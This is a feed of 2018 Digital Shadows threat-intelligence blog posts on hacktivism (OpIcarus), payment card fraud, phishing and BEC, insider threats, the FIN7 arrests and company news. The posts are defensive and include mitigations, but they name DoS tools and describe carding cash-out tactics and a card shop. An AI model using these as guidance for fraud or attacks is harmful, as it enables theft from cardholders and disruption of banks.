Digital Shadows Manage Your Digital Risk Fri, 17 Aug 2018 17:44:14 +0000 en-US hourly 1 Five Threats to Financial Services: Part Five, Hacktivism Wed, 15 Aug 2018 16:08:18 +0000 OK, so it’s not a sexy as insider threats, banking trojans, phishing campaigns or payment card fraud, but hacktivism is still a threat that organizations should be concerned with. In this final post on threats to financial services, we’ll outline recent developments in the hacktivist world and focus on the threat posed by one campaign in particular: OpIcarus.


What is Hacktivism?

Hacktivism is the extension of activism into the information security sphere, using tactics like defacement, doxing and denial of service (DoS) to achieve political or ideological goals. The success of hacktivist operations varies significantly, depending on A) levels of participation and B) levels of organization.

The Anonymous collective has been the main brand of hacktivism since its emergence in 2008, but it has since splintered into smaller, regional hacktivist groups who target companies in line with regional and national geopolitical objectives. (For more on this shift, you can read our blog about the emergence of the Anonymous collective and its subsequent transformation).



Over the past two years, we have published several blogs on the various iterations of OpIcarus, a campaign first launched by Anonymous. OpIcarus began as a planned physical protest on February 8, 2016, calling for action to “shut down the banks” and disrupt the global financial system. With increased user participation, the operation gained traction across a host of online sources. The operation reached its zenith in mid-2016 (as demonstrated by Figure 1) when participants claimed to have successfully performed DoS attacks against over 60 global banks. Orchestrating their attacks through social media and Internet Relay Chat (IRC) groups, OpIcarus encouraged users to use the Low Orbit Ion Cannon (LOIC), a popular tool for performing DoS attacks. Participants freely shared tools and techniques on these channels, hoping to co-opt more supporters for their campaign and, in turn, amplify the potency and impact of their attacks.

Figure 1: Mentions of “OpIcarus” across blogs, criminal forums, paste sites and dark web pages between 2016 and August 2018

While OpIcarus no longer attracts the attention it did in 2016, it should not be discounted. This month, we’ve observed the “doxing” of a VIP of a global bank as part of the 2018 wave of OpIcarus attacks. Furthermore, at the end of May 2018 the online and mobile banking services of Rabobank were taken offline for several hours following a Distributed Denial of Service attack (DDoS). Shortly after this announcement, a post on Pastebin claimed responsibility for the attack as part of OpIcarus. The post also referred to 57 other global banks designated as OpIcarus targets, as well as advice on which tools to use. Unlike in 2016 when LOIC was recommended, individuals are now advised to steer clear of the tool, instead preferring other DoS or “Stresser” services such as “xerxes”, “Slowloris”, and “Ufonet” (see Figure 2). For financial institutions – particularly those named on the OpIcarus target list – this shift in tooling is significant for understanding the threat level posed by the campaign and what defensive measures should be implemented to ward off DDoS attacks.

Figure 2: A post claiming responsibility for the Rabobank DoS attack on May 24, 2018

In this Pastebin post claiming responsibility for the Rabobank attack, the author includes the OpIcarus hashtag along with references to other hacktivist operations, including OpPayback, a campaign focused on the Netherlands. This tagging of attack claims under multiple operational banners is common within the hacktivist community. With Anonymous devolving into smaller, more regional groups and operations, hacktivist actors will often use hashtags from large, well-known operations to solicit support for their attacks and objectives.

These operations are no longer centrally coordinated by an influential core of hacktivists who decide on suitable targets, timing of attacks and overall campaign objectives. Whereas OpIcarus began with global aims to shut down the financial system, in 2018 it is more commonly used in regional operations with narrower and more localized ambitions – in this case being specifically targeted at financial institutions in the Netherlands and aligned with OpPayback. Similarly, a version of OpIcarus, OpIcarusNi, seeks to apply the operation to Nicaragua in the wake of recent political and economic tensions in the country. With this decentralization, it’s unlikely that OpIcarus will garner the levels of support and orchestration seen in its 2016 heyday.

Figure 3: Pastebin posts referencing “OpIcarus” in the past 12 months


The Future of OpIcarus: Down but not Out

It’s clear that OpIcarus has changed considerably since its emergence in 2016. The 2018 operation is often performed in tandem with local hacktivist operations, with participants encouraging the use of different DoS and stresser tool sets. Despite a perceived decline in threat level and a shift to a more regional approach, the successful Rabobank DDoS attacks demonstrate that hacktivism still poses a threat to banks across the world. Today, OpIcarus attacks are far more sporadic and unpredictable given the loss of centralized command by the Anonymous collective.

To stay ahead of the threat, financial institutions should begin tracking the online activity of local and regional hacktivist actors in the event that they perform attacks under the OpIcarus banner; it’s no longer sufficient to rely on announcements from the most influential global Anonymous social media accounts, as attack claims are often performed by lesser-known Anonymous offshoots. This includes monitoring paste sites and social media for mentions of their domains and IP addresses, while following developments in hacktivist tooling to ensure DDoS defenses are up-to-date and appropriate.


To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

Five Threats to Financial Services: Part Four, Payment Card Fraud Tue, 14 Aug 2018 18:04:02 +0000 Payment card information is the lifeblood of the cybercriminal ecosystem. In previous blogs in this series, we’ve focused on how cybercriminals acquire customer banking information using banking trojans and phishing campaigns. However, this merely represents the initial steps that form one part of a wider payment card fraud network. This post focuses on the three steps fraudsters turn to in order to monetize these stolen payment cards. Banks can learn from these steps to inform their own defenses.

How Cybercriminals Use Stolen Payment Cards

Step 1: Learn the latest techniques

As fraud defenses evolve, cybercriminals similarly adapt their tactics to avoid detection and increase their fraud success rate. One such example is the emergence of the Genesis Market, an online marketplace that provides a way to imitate the browser of a victim in a bid to evade fraud solutions. Genesis (shown in Figure 1) has been in development for several years and is currently in Beta mode, but has gained positive reviews across carding forums over the past few months.

Figure 1: A screenshot from the Genesis market

There are many ways fraudsters can learn about the latest trends and gain tips for conducting their activities. Last year we published a whitepaper, Inside Online Carding Courses, on a professional e-learning carding course, complete with webinars, instructors and reading material. The increased professionalization and sophistication of this fraud has negative implications for credit card companies, merchants, and consumers. The course, which costs attendees $1000, included modules advising the best cards to target and which geographies to focus on. By studying these courses, banks can gain an understanding of the extent to which their customers are popular targets for fraudsters.

Figure 2: A translation of the advertised online learning course for carders


Step 2: Buy payment cards from a reputable site

While it’s possible that cybercriminals who harvest payment card information may commit fraud themselves, it’s more common to bulk sell this data to a distributor. Online credit card shops, also known as Automated Vending Carts (AVCs), play a crucial role in selling stolen payment cards. These shops buy bulks set of payment cards and sell them on piecemeal to wannabe fraudsters. AVCs have vast numbers of payment cards for sale, with those in the United States by far the most popular (Figure 3).

Figure 3: Cards for sale on C-v-v[.]su

Most AVCs will often provide a “checker”, an automated feature to check if the card is still active and determine its balance. For those purchasing cards on a site that lacks payment card validation, another method used to check the cards is an Internet Relay Chat (IRC) room for a nominal fee of $0.15. This serves as a reminder that criminals do not need to cash out to make money from carding – there’s plenty to be made from support services too. Banks can monitor for mentions of the Bank Identification Numbers (BINs) to detect early stages of fraud.

This industry attracts the ire of law enforcement and there have been some notable arrests and seizures. AlphaBay, a dark web marketplace that had its own automated credit card shop, was seized over a year ago. Shortly after, members associated with the Infraud Forum were indicted. Most recently, on August 1st, 2018, the US Department of Justice filed criminal charges against three men reported to be associated with the organized criminal group known as FIN7. Despite these clear successes, it would be naïve for us to assume that this spells the end for AVCs.


Step 3: Commit payment card fraud and cash out

With the latest techniques learned and valid payment cards purchased, the final stage is to “cash out” and monetize this data with one of three main tactics:

  1. Direct Purchase of Goods. Fraudsters use sites that are cardable (susceptible to fraudulent purchases as a result of lax security controls) in order to make fraudulent purchases with stolen payment card information. Criminals collaborate and share lists of cardable sites that individuals can turn to that allow goods to be purchased with stolen payment cards. The carder will then purchase goods and resell them for a reduced price in order to receive clean money.
  2. Agent Fraud. A carder impersonates a hotel or airline agent, makes a reservation in the cardholder’s name, waits for the card to authorize, and then changes the reservation name. Social engineering is central to this approach.
  3. Drops and Middlemen. As demonstrated by FIN7, cybercriminals register fake companies that search for unemployed and vulnerable people to take seemingly legitimate jobs as a “Merchandising Manager” or similar. This job involves reshipping fraudulent goods and counterfeit money to safe addresses. Just as with agent fraud, social engineering is key. The websites must look convincing in order to sway the individual to work for the bogus company. It is also a reminder to us that just because a website has https, does not mean it is a legitimate website.

Fighting Payment Card Fraud: En Carde

Cashing out is the final stage within a vast payment card ecosystem. Often criminals will target retailers’ websites to monetize this information, but there are plenty of steps banks can take to detect this fraud and the different stages of the fraud lifecycle. There are three ways banks may gain visibility into payment card fraud:

  1. Benchmark yourself against peers. Understand which card providers fraudsters recommend not using and use this to understand where your company stacks up.
  2. Monitor IRC checking channels. Monitor these channels for Bank Identification Numbers (BINs) and Issuer Identification Numbers (IINs) that are indicative of a criminal testing an individual’s card.
  3. Monitor AVC shops for BINs and IINs. Monitor for BINs and IINs that are offered for sale. In many cases, it is possible to free text search and filter by BIN numbers.

With billions of dollars lost to payment card fraud each year, these steps can help to reduce fraud against your organization. You can read more about cashing out in our whitepaper, Inside Online Carding Courses.

In the final blog of the series, we’ll look into the threat of hacktivism for the financial services industry.


To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

ShadowTalk Update – 08.13.2018 Mon, 13 Aug 2018 16:07:30 +0000 In this week’s ShadowTalk it’s all things phishing. Rose Bernard and Simon Hall join Rafael Amado to discuss the recent arrest of three alleged members of the FIN7 organized criminal group. The team look over the United States Department of Justice’s indictment, focusing on how FIN7 use social engineering and sophisticated phishing to great effect, before talking more generally about the threats of business email compromise and malspam.


New tweets weaken credibility of extortionists thedarkoverlord

The thedarkoverlord threat group claimed to have exfiltrated sensitive data from five more companies since their last claim in April 2018. Although the extortionists continue to focus on the healthcare sector, the additional claims include attacks on a tax company and a high-profile United States law firm. TDO’s credibility as a threat group has been based largely upon previous leaks that were confirmed as genuine; however, the group has enacted only three data leaks since September 2017, and the leaked data is currently unavailable, preventing independent verification. Therefore, TDO’s threat profile has changed since 2017 and, although its members will likely continue tweeting claims of data exfiltration in the next two to four weeks, their claims may not be legitimate.


MikroTik routers infected in cryptomining attacks 

Security researchers identified a cryptomining campaign exploiting vulnerable MikroTik network routers in Brazil. Initially the infected routers injected the Coinhive cryptominer script into the code of all Web pages visited through the router. After researchers identified this tactic, the campaign injected the script only into the code of error pages. One Coinhive key was used, indicating that one threat actor was responsible. Companies using MikroTik devices should prioritize patching to mitigate against the campaign.


Semiconductor maker hit by WannaCry ransomware, shuts down systems

The chip manufacturer Taiwan Semiconductor Manufacturing Company (TSMC) was forced to shut down some of its systems due to malware, which was later confirmed to be WannaCry ransomware. TSMC stated that the infection was not the result of a direct attack. Allegedly the malware had transferred to the system via a download, during a routine software update from a presumably compromised third-party supplier. No technical indicators were provided to independently confirm whether this was the variant of WannaCry responsible for global infections in May 2017; regardless, the incident demonstrates the importance of running all software downloads through anti-virus solutions before introducing them to a system, even those from trusted suppliers.


US healthcare provider victim of business email compromise

The United States healthcare provider UnityPoint Health reported that it had been the victim of a phishing attack that allowed access to internal networks between March 14 and April 3, 2018. Despite the company’s claim that attackers had sought access to vendor-payment or payroll systems, the personally identifiable information of approximately 1.4 million patients was compromised in the attack.


Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

Digital Shadows Contributes to Insider Threat Research Thu, 09 Aug 2018 15:08:29 +0000 On July 30, Forrester published its latest research report on malicious insiders, Defend Your Data As Insiders Monetize Their Access. With research content provided by Digital Shadows, the report details how insiders with valuable data or privileged access are using online forums and marketplaces to find buyers. At the same time, cybercriminals are using these same platforms to actively recruit insiders from a variety of industries. As many of these criminal forums are located on the clear web, it’s a reminder that we shouldn’t hyper focus on dark web sources alone.


Risks to financial services, retail and healthcare

One of the findings in Forrester’s report is that organizations in the financial services, retail and healthcare industries have some of the highest risk when it comes to malicious insiders. With organizations in these industries handling so much sensitive customer data (think personally identifiable information (PII), health records and payment card details), this is hardly a surprise.

In one our previous blogs, Five Threats to Financial Services: Part One, Insiders, we looked in greater depth at some of the issues financial services organizations should consider when monitoring for insiders, including cybercriminals on the lookout for accomplices with access to SWIFT banking systems, and the emergence of dedicated sites for individuals looking to sell insider trading information.


Telecommunications insiders and SIM-swapping

While the above industries are extremely valuable from an insider perspective, Forrester also stresses that any number of industries dealing with sensitive intellectual property or customer data can be susceptible to this threat. These include manufacturing, technology and telecommunications.


Figure 1: User on a Russian-language forum requesting healthcare insiders (Translation: “Looking for doctors heading hospital departments or directors of private clinics”)


For the telecommunications industry specifically, there is a demand for insiders who can facilitate SIM-swapping or -hijacking attacks. SIM-swapping plays on a technique that millions of people do every year when transferring phone numbers to a new mobile network. Here an attacker will typically contact a target’s network provider and use social engineering techniques to convince network support staff to switch calls and texts to a new SIM that they control. From here they can bypass two-factor authentication methods such as those used in online banking accounts.

In the criminal forum post below (Figure 2), a user claimed to have multiple workers operating at three large UK network providers who were able to perform SIM swaps.

Figure 2: Criminal forum user offering SIM swapping services (Screenshot taken from Digital Shadows platform)


Don’t forget the accidental insider

One area that was out of the scope of the insider report, but should nonetheless be high on the radar of all organizations, is the risk associated with accidental insiders. Unlike cognizant and malicious individuals looking to peddle their privileged access or sensitive company information, an accidental insider is instead an employee who has unwittingly compromised their organization through poor security practices. In many of the examples of sensitive exposure that we see, it’s the case of innocent staff leaving sensitive systems exposed to the public Internet, misconfiguring their devices, or sending highly confidential data to unsecured locations in the cloud.

Our previous whitepaper, Too Much Information, demonstrated how employees, contractors and third parties are often responsible for some of the most serious security breaches by misconfiguring network file sharing services and storage solutions such as Amazon S3 and Network Attached Storage (NAS) drives. A prime case is that of the contractor performing penetration tests. In the example below (Figure 3), a penetration testing company uploaded a lengthy report detailing all of an organization’s outdated servers, missing patches and network infrastructure. Why go to all of the trouble of recruiting and paying a company insider, along with the risk of exposure that entails, when sensitive company secrets are freely available online?


Figure 3: Screenshot of penetration test report contents page exposed through misconfigured file sharing service


Likewise, in our latest join research paper, ERP Applications Under Fire, we found examples where employees and third parties had left full login credentials for critical Enterprise Resource Planning applications on public Trello boards, a cloud-based project management tool.

Figure 4: ERP credentials left exposed on open Trello board


Securing your organization from accidental insiders

Preventing breaches and exposure through accidental insiders requires a mixture of technology, process and training. For organizations looking to minimize this threat, consider the following:

  1. Provide security awareness training for all staff, including contractors and third parties. This should also cover the risks of using home NAS drives for company data and archiving files using file sharing services.
  2. If employees and contractors need to use NAS devices, then users should add a password and disable guest/anonymous access, as well as opt for NAS devices that are secured by default. If possible, you should look to offer backup solutions so that contractors and employees don’t feel the need to back-up their devices at home.
  3. Ensure two-factor authentication (2FA) is enabled across the organization where possible. This will help prevent unintentionally leaked credentials being leveraged by malicious actors.
  4. Restrict access to important data to only those who are required to have it. Read/write access should only be granted where there is an explicit business requirement.
  5. Monitor your external footprint for cases of accidental data loss and exposure. Document Loss Prevention solutions can help identify cases where sensitive information has left your estate.
Five Threats to Financial Services: Phishing Campaigns Wed, 08 Aug 2018 16:00:38 +0000 In our last blog, we highlighted how banking trojans are a threat to banking customers and small businesses, normally delivered via phishing emails containing malicious attachments. While phishing is a threat to businesses and individuals in all industries, attackers targeting financial services organizations often use highly-crafted social engineering tactics to make sure they hit their mark. In the third blog of the series, we’ll take a deeper look into the techniques used to phish financial organizations, as well as ways in which you can mitigate these attacks.


What is phishing?

Phishing is a tactic where the attacker poses as a legitimate individual or service to gather sensitive information such as credentials or payment card information, or install malware on the target’s device. This is usually achieved either with an email containing a malicious attachment, or a URL link that will redirect the victim to a malicious domain where they will be asked to provide sensitive information or install plug-ins.

Email phishing campaigns can be wide and indiscriminate in their targeting, hoping that recipients will not recognise the fraudulent nature of the email. In many cases these emails are used to deliver malware such as the banking trojans.


What is Spear Phishing?

Spear phishing is a form of phishing that targets a specific individual or organization.  Frequently, the emails are tailored to the recipient to make it more believable. Two common types of spear phishing are:

  • Business Email Compromise (BEC). There are many different versions of BEC, but in one popular method the attacker will either spoof an executive’s email address and impersonate them, or even used a compromised business email account, to get an employee, customer or supplier to transfer funds or sensitive information to the phisher.
  • Whale phishing (or Whaling). Another form of BEC, although high-level executives are the target. Attackers can use information pertaining to the executive found on public sources, including their name, phone number, email, or professional address when selecting their targets and developing social engineering tactics.

Phishing Financial Organizations

Knowing your target

An attacker will often spend considerable time investigating their target, so they can tailor the email to them and make it as compelling as possible. In recent years we’ve seen threat groups specializing in specific industries and geographies, resulting in a high level of sophistication in their attacks.

Let’s take the example of the Carbanak malware, which has been associated with several different campaigns against financial institutions, retail businesses, ATM systems and point-of-sale service providers. As the malware is in public circulation, it has been attributed to more than one group, including both the Carbanak group and FIN7. It’s unclear whether these groups are associated or simply share use of the malware and similar tools.

Operators of the Carbanak malware use social engineering techniques such as spear phishing in combination with malicious attachments containing the malware. When targeting financial companies, the emails are tailored to employees, appearing to have been written by native English speakers familiar with both investment terminology and the inner workings of public companies (see Figure 1 below). The emails frequently play up shareholder and public disclosure concerns.

Figure 1: Example of FIN7 phishing email (Source: FireEye)


Digital Shadows recently discovered files and source code that were allegedly related to the Carbanak group. Whatever the actual provenance of the leaked source code and files, these findings provided significant insights on how criminal groups target financial organizations with a level of sophistication that displays a strong understanding of the industry. The files not only contained the malware used to target the organizations, but also included detailed information on banking systems, instructions on how to make fraudulent payments and bypass anti-fraud features, and a list of key personnel responsible for payment processing in each of the target banks.

But how can attackers collect the information needed to learn about their targets and make their emails more believable? An open source investigation can provide a lot of information during the reconnaissance phase of the attack. An attacker will try to find any social media accounts pertaining to their victim(s), credentials found in past breaches, email and phone numbers in company material, personal addresses and emails linked to possible domains registered under the individual or provided in public company registries and assets under their name. The most sophisticated attackers, such as the Carbanak group, will often have contacts or insiders within financial organizations who can provide them with more specialized information or even privileged access to perform their operations.


Low barriers to entry

The lack of technical background or unfamiliarity with financial services terminology is not a hindrance to someone who wants to perform a phishing attack. If the attacker cares about harvesting credentials and credit card information from opportunistic targets, ‘finesse’ and technical capability is not a primary requirement. In many criminal marketplaces, aspiring attackers can find listings for complete phishing pages, usually clones of known organizations, that anyone can buy along with instructions on how to use them (See Figures 2 and 3).

Figure 2: Listing offering phishing pages for sale (Source: n0va[.]shop)


Figure 3: Tutorial on how to create a phishing page (Source: xplace[.]com)


Business Email Compromise

During a BEC, the attacker will impersonate a company executive and attempt to get an employee, customer or supplier to transfer funds or sensitive information to the phisher. A 2017 advisory from the Federal Bureau of Investigation’s (FBI) Internet Crimes Complaint Centre (IC3) reported that BEC attacks between October 2013 and December 2016 caused worldwide losses totalling over $5 billion. Recently, a six-month coordinated global law enforcement effort under the name “Operation Wire Wire” targeted business email compromise schemes, which resulted in 74 arrests.

Two highly publicized BEC attacks that hit the news in recent years are those that targeted Xoom and Scoular. Both are financial companies where spoofed emails were sent to their employees, resulting in transfers of millions of dollars to third party accounts. In Xoom’s case the emails targeted their finance department, while in Scoular’s the emails impersonated the company CEO. In some scenarios, if the attacker is familiar with the organization and its processes, they could also take advantage of real life events such as tax deadlines or impending financial deals to make their phishing attempt more believable.


Mitigating phishing attacks

Standard countermeasures such as anti-spam filters and anti-malware protections will usually filter out part of these types of scam emails; however, they are not fool-proof, especially against the most targeted attacks such as spear phishing and whaling. Organizations should therefore look to adopt a broader approach, which can include:

  • Educating your team. Organizations should heavily invest on educating their personnel against these types of attacks and how to recognise them. Update your security awareness training content to include the BEC scenario. This should be a part of new hire training, but you should conduct ad-hoc training for this scenario as well. Additionally, employees should only have access to the infrastructure and resources appropriate for their position and level, that way even if they are compromised the attacker will be limited to that part of the company network. Two-factor authentication should also be required as part of the company’s security policy.
  • Updating your incident response strategy. You need to build BEC into your contingency plans, just as you have built ransomware and destructive malware into your incident response/business continuity planning.
  • Introducing continuous monitoring. Conduct ongoing assessments of your executive’s digital footprints. You can start with using Google Alerts to track new web content related to them.
  • Enhancing company policies around wire transfers. Work with your wire transfer application vendors to build in multiple person authorizations to approve significant wire transfers and prevent successful BEC attempts against your organization.
  • Establishing an OPSEC Program. Formalize an Operations Security (OPSEC) program. Organizations and their employees often, unknowingly, expose detailed personal information or information about the systems and third parties they use on social media and other sources. In the wrong hands, this information can be used effectively to socially engineer a target.


In our next blog of the threats to financial services series, we’ll cover everything you need to know about payment card fraud. Stay tuned.

To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

ShadowTalk Update – 08.06.2018 Mon, 06 Aug 2018 15:29:50 +0000 In this week’s episode, JP Perez-Etchegoyen, CTO of Onapsis, joins Michael Marriott to talk about the exposure of SAP and Oracle applications, the increase in publicly-available exploits, and the threat actors we have observed targeting the sensitive data held within these applications. Download the full report, ERP Applications Under Fire, to learn more.



Kronos or Osiris: both gods spell trouble for banking customers

The once-prolific banking trojan Kronos has resurfaced in three active campaigns, each using different infection techniques and targeting different geographies. This revived activity coincides with an advertisement on criminal forums for a trojan called Osiris, which has similarities to Kronos and is referenced in one of the campaigns. This could indicate an attempt to rebrand the trojan. Read our recent blog on banking trojans to find out more.

Multi-tiered supply-chain attack identified

Unidentified threat actors successfully targeted “the supply-chain of a supply-chain” to distribute cryptocurrency miner malware. A software vendor hosting additional packages for a PDF editing application was compromised, effectively turning the app’s installer into a malware distributor. The campaign’s overall impact was low, as only a small number of users were impacted. However, this attack method was sophisticated and highlights the increasing risks posed by supply-chain attacks.


Thedarkoverlord returns to target Florida healthcare facility

Extortion threat actor(s) thedarkoverlord posted a link on their Twitter account to a downloadable folder containing potentially sensitive healthcare information. The data had allegedly been sourced from a doctor in Florida, United States, and was likely published after a failed extortion attempt. This latest attack is consistent with thedarkoverlord’s previous targeting of the healthcare sector and use of sensitive data for extortion purposes, meaning such tactics may continue.


Middle East remains a target for cyber espionage activities

The threat group “DarkHydrus” targeted government entities in the Middle East with a custom PowerShell backdoor malware. The group sent spearphishing emails containing Excel Web Query files—text files containing a URL automatically opened by Excel. The Necurs botnet recently exploited this same file type in a campaign to deliver a remote access trojan. DarkHydrus has been active since early 2016, and originally abused legitimate open-source tools for malicious purposes. Their custom backdoor “RogueRobin” was potentially pieced together using code from these tools.



To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

FIN7: Arrests and Developments Thu, 02 Aug 2018 16:26:38 +0000 Three alleged members of FIN7 arrested

On August 1st, 2018, the US Department of Justice filed criminal charges against three men reported to be associated with the organized criminal group known as FIN7. The indictment states that FIN7:

  • Targeted 3,600 business locations across the United States, United Kingdom, Australia, and France. This included companies in 47 US states.
  • Compromised 6,500 individual point-of-sale terminals.
  • Stole more than 15 million customer card records.


What is FIN7?

FIN7 is a cybercriminal group that has primarily focused on acquiring payment card information. There has been a little confusion surrounding the naming of this group, conflating FIN7 with both the Carbanak group and the Jokers Stash online credit card store. To add further confusion, the Carbanak group – whose alleged “kingpin” was arrested on 26 March 2018 – also shares its name with the CARBANAK malware, which is used to infiltrate financial institutions and steal funds from the target organization. The malware, however, has been in public circulation since September 2015, meaning that it is in the hands of multiple cybercriminals and groups. FIN7 has used an adapted version of the CARBANAK malware to facilitate the theft of card records, leading to the unconfirmed association between FIN7 and the Carbanak group.

Joker’s Stash refers to an infamous online card shop (which we have discussed in a previous blog on blockchain DNS). While the indictment states that many of the cards stolen by FIN7 have been sold on Joker’s Stash, this is just one of many online card shops available to cybercriminals selling payment card information and should not be considered synonymous with FIN7.

The DOJ’s indictment contains several documents outlining the charges against the three individuals as well as an overview of how FIN7 attacked organizations and stole data. In this blog we’ll provide some key observations on FIN7’s operations and on what these developments will mean to the future of payment card fraud.


1.    Sophisticated phishing and social engineering are the cornerstones of FIN7’s success

As we see time and time again, the most effective technique used to deliver malware and perform network intrusions is phishing, and FIN7 are no different. By sending emails from addresses like “”, FIN7 members were able to convince victims into opening a malicious word document. An example, shown in Figure 1, was provided as part of the indictment. To add further legitimacy, this technique was often accompanied by phone calls to the target business, where the caller would goad the victim into opening the attachment to execute the malware.


Figure 1: An email provided as part of the DOJ indictment:


2.    Shell company established

The indictment states that a shell company, Combi Security, was established “to provide a guise of legitimacy and to recruit hackers to join the criminal enterprise”. Although the site is no longer accessible, there are numerous references to combisecurity[.]com online, showing how FIN7 used a combination of online forums and legitimate job sites to recruit their members. However, it should be noted that many members were likely unaware of the true nature of the shell company.


Figure 2: A screenshot of the combisecurity[.]com site, by a user claiming to have designed their website


Figure 3: A job advert from November 2015 on the Superjob site


Figure 4: A forum post from June 2016 looking for a System Administrator for Combi Security

3.    The online market for payment cards is alive and healthy

The indictment stated that many of the card records were sold on Joker’s Stash. Although there are likely to be many more members of FIN7, the arrests of these three individuals may result in reduced traffic through this site.

Indeed, this follows on from a string of notable arrests in 2018. Back in February 2018, the Department of Justice unveiled another indictment against 36 individuals associated with the Infraud Forum, a cybercriminal forum specializing in payment card fraud.

While these will all be significant blows to the flow of stolen payment cards online, plenty of shops remain. On just one site, c-v-v[.]su, there are over 1.2 million cards for sale, over 400,000 of which have CVVs associated.


Figure 5: Cards for sale on C-v-v[.]su



4.    United States the most popular geography for stolen payment cards

While FIN7 targeted businesses in the United Kingdom, Australia, and France, the group stole more than 15 million customer card records from over 6,500 individual point-of-sale terminals at more than 3,600 separate business locations in the United States alone. That’s not a surprise, and it’s a trend we see across multiple forums and marketplaces. For example, of the 1,249,234 cards for sale on c-v-v[.]su, 998, 089 (80%) were from the United States.

A similar story occurs if we count up the mentions of payment cards for sale across two closed forums, Exploit and Verified. Here the United States stands out with over 50% of all the mentions.


Figure 6: Geographies of payment cards discussed on Exploit and Verified forums between May and June 2018


The outlook

These latest charges highlight that the DOJ is picking up speed and treating online payment card fraud as a priority. However, as with the Infraud Forum indictment, these arrests should be viewed in the wider context of what is a very large, well-developed and diffuse criminal ecosystem.

Given large array of online stores available for cybercriminals to sell stolen card details, it’s hard to imagine that the arrest of these three individuals will have a noticeable impact to the threat posed to merchants, consumers and financial institutions. Likewise, FIN7 is a large operation and the majority of the group’s members are still at large. Finally, given that the CARBANAK malware is not bespoke any one group, payment card theft and other types of data exfiltration will continue to occur as long as this malware and other, similar tools are in public circulation.

With FIN7 displaying its adeptness for sophisticated phishing and social engineering techniques, look out for our upcoming blogs in our Five Threats to Financial Services series, where we’ll cover both phishing and payment card fraud in greater detail.

Diversity of Thoughts in the Workplace: Are You Thinking What I’m Thinking? Wed, 01 Aug 2018 16:14:22 +0000 In my most recent blog post I discussed Digital Shadows’ Women’s Network and how it is helping us shape wider conversations on diversity and inclusion. In this blog, I want to unpack-diversity of thought and how businesses benefit from a diverse talent pool.

In 2013, Deloitte released a new research report on Diversity of Thought and described this concept as: “The idea that our thinking is shaped by our culture, background, experiences, and personalities”.

By harnessing and promoting the different ways in which we all process information, organizations can reap many tangible benefits. Some of the top being:

Increased employee engagement and retention

You’ve hired a diverse workforce…now what? By promoting diversity of thought within management styles, companies can not only retain employees longer, but also provide a more meaningful experience at work, one that’s more personalized to learning preferences and allows employees to play to their strengths.

Decreased groupthink and cognitive dissonance

Deloitte points out that by increasing diversity of thought, employees are less likely to disregard new information or be afraid to challenge the status quo. Your workforce will feel safer to present new ideas and, more importantly, to disagree. In turn, this may also lower cognitive dissonance (e.g. believing one thing, but doing the other).

Ultimately, diversity of thought fosters one of my favorite concepts, psychological safety, which is a shared belief amongst teams that they perceive they are safe to take risks, and is one of the core indicators of highly effective teams.

Happier clients means more revenue

An article that Glassdoor wrote in 2017 showcases how Diversity and Inclusion programs can directly affect revenue and client success. For example, Hilton empowers leaders to build diverse teams because they are able to harness different skill sets for the unpredictable moments that happen oh so often in a hospitality-driven organization.

As a service-based company ourselves, we value constructive conflict, differences in opinion, and want to further promote the unique backgrounds and traditions our workforce brings.

While the benefits of promoting diversity of thought are clear, it’s not easy to make these changes. Organizations will need strong leadership backing in order to not only train managers on more inclusive management styles, but also to reconsider their organizational policies to ensure they cater to a diverse workforce (flexible working hours, parental leave, etc.).

My most recommended leadership strategy book, Profit from the Positive, promotes the concept of getting the “best” out of your employees, not the “most”. Even more so, keep in mind that the best of one employee is always different than the best of another.


To stay up to date with the latest from Digital Shadows, subscribe to our emails here.

Security Spotlight Series: Dr. Richard Gold Tue, 31 Jul 2018 15:57:48 +0000 Organizations rely on Digital Shadows to be an extension of their security team. Our global team provide the latest tooling, relevant research, much needed context, tailored remediation advice and managed takedown support to make our clients’ jobs easier and more efficient.

In our Security Spotlight Series, we bring our team out of the shadows and into the spotlight. In this edition, we profile Dr Richard Gold, Digital Shadows’ Head of Security Engineering.

Name: Dr. Richard Gold
Team: Security Engineering
Title: Head of Security Engineering

Q: What areas do you focus on as Head of Security Engineering?

A: My team and I work on pre-product development – that is researching interesting and novel security techniques to see how we can integrate them into the product. We also focus on internal security, which includes performing security assessments such as Purple Team exercises, where we model and replicate both offensive and defensive attack techniques in order to learn how to best protect the organization.


Q: How have your past experiences helped you in your role at Digital Shadows?

A: For the last 20 years I have spent a lot of time doing networking, working with operating systems and programming – the three pillars of security engineering. I’ve always had a passion for security since I was a teenager, so working in this field is a dream come true. Doing a PhD also taught me the value of persistence, to keep going even though the solution may be quite far down the line and all hope seems lost.


Q: What have been your highlights working at Digital Shadows?

A: What I really enjoy is having an idea, doing some initial proof-of -concept work and then taking that into production alongside our engineers. Seeing that go live and then provide value to our customer is really exciting. Also, we’ve done a lot of large-scale reconnaissance projects for major financial institutions and enterprise organizations; these were always really instructive experiences to learn what organizations look like from the outside and how attackers use this information to perform their attacks.


Q: How do you see Digital Shadows’ work providing value to customers?

A: Our goal is to protect our clients and help our clients protect themselves. In Security Engineering we try to emulate attacker tradecraft as closely as possible and automate that in a scalable fashion to deliver to our customers. Through our research we seek to reduce our clients’ uncertainty around the risks that they face online.


Q: In your experience, what is the single biggest threat or risk that organizations fail to deal with effectively?

A: Two words: security debt. This is the accumulation of missed patches, unchanged credentials, misconfigurations, and the lack of attack surface reduction typically caused by the scaling issues that appear as organizations grow. These things add up over time to cause some very significant risks to organizations.


Q: What is the most commonly misunderstood problem in cyber security?

A: That you can buy your way to security without putting the time in to really get to know your environment or your tools. Security is all about the details, and that’s a big job. You need to understand how your environment operates, where the flaws are, and how attackers can then take advantage of those flaws.


Q: What advice would you give someone starting out as a security engineer?

A: Learn networking, operating systems and development. Security is really a mindset – it’s about how you view these technical areas. You need to have experience of using, building, maintaining systems to appreciate the challenges.


Q: What is one thing that most people don’t know about you?

A: I have been training traditional Japanese martial arts for over 12 years.


Interested in hearing more from our team? Check out our blogs or subscribe to our weekly threat intelligence podcast, ShadowTalk.


